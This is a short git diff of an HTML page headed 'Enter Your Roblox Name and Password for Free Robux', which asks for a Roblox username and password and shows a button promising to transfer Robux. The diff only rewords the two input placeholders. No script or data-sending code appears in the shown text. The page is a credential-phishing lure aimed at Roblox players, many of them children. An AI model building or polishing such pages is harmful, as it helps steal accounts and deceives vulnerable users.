--- a/index.html
+++ b/index.html
@@ -64,8 +64,8 @@
 <body>
   <h1>Enter Your Roblox Name and Password for Free Robux</h1>
   <div class="container">
-    <input type="text" id="roblox-name" placeholder="Enter Your Roblox Name">
-    <input type="password" id="roblox-password" placeholder="Enter Your Roblox Password">
+    <input type="text" id="roblox-name" placeholder="Your Roblox Name">
+    <input type="password" id="roblox-password" placeholder="Your Roblox Password">
     <button id="submit">ENTER</button>
     <button id="robux-button" class="robux-button">Your Robux is Ready, Click to Transfer Your Robux to Your Account</button>
   </div>
